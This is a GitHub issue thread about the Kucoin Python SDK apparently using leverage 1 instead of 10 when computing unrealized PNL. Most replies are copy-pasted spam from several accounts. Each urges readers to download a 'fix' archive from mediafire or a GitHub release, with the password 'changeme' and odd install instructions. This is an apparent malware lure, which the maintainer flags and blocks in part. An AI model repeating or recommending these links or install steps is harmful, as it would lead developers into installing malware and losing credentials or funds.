### ISSUE TITLE
Claculation of unrealized PNL wrong on Kucoin, if I am using SDK Order command

### ISSUE THREAD

**Issue by BWitsch** [Kucoin/kucoin-python-sdk#120]
Dear developer team,

I am using the Kucoin future sdk in a python 3.12 environment.
I found something curios:
If I using the command: _trade.create_market_order(symbol, side='sell', lever=10, size = 1, client_Oid = client_oid)_
with leverage "lever 1" it works and the values on Kucoin are correct.
If I am using it with "lever 10" the lever is shown in the order and in POE but the unrealized PNL is calculated with 1 (not with 10!!)
![Kucoin Order - Unrealized PNL problem Screenshot 2024-08-20 054019](https://github.com/user-attachments/assets/7427b618-df32-4984-9325-8ffe8d2a639f)

If I create the same Order on Kucoin directly the order values are correct.
Is this a problem of the SDK or of Kucoin?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ISAAC-XXYYZZ** [comment]
> Dear developer team,
> 
> I am using the Kucoin future sdk in a python 3.12 environment. I found something curios: If I using the command: _trade.create_market_order(symbol, side='sell', lever=10, size = 1, client_Oid = client_oid)_ with leverage "lever 1" it works and the values on Kucoin are correct. If I am using it with "lever 10" the lever is shown in the order and in POE but the unrealized PNL is calculated with 1 (not with 10!!) ![Kucoin Order - Unrealized PNL problem Screenshot 2024-08-20 054019](https://private-user-images.githubusercontent.com/60389361/359330938-7427b618-df32-4984-9325-8ffe8d2a639f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDU2MjAsIm5iZiI6MTcyNDc0NTMyMCwicGF0aCI6Ii82MDM4OTM2MS8zNTkzMzA5MzgtNzQyN2I2MTgtZGYzMi00OTg0LTkzMjUtOGZmZThkMmE2MzlmLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA3NTUyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWVlZGM3ZmU5NDYyYjhjMmRhZWJjOWM4ZDkyYTdhMDdlOWRjMjI1OTBlYjRhMWYwZmQyNGYwMTA5ZDMxMjkwNTAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.gHV7al6gXC_E5rljFeGBQ-6zp9V4IxT7-N5259HwmYk)
> 
> If I create the same Order on Kucoin directly the order values are correct. Is this a problem of the SDK or of Kucoin?

I have already informed the team to check if there are any issues. Please be patient and wait.

**Comment by ISAAC-XXYYZZ** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I'm not sure if this is the right solution; it seems a bit strange to me. Why would a compressed file be sent? This could potentially be malware or something similar. Please be cautious and verify it carefully.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ISAAC-XXYYZZ** [comment]
This user @rajnikyadav  is highly suspected of being malware-related information and has been blocked. Please do not trust its content.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
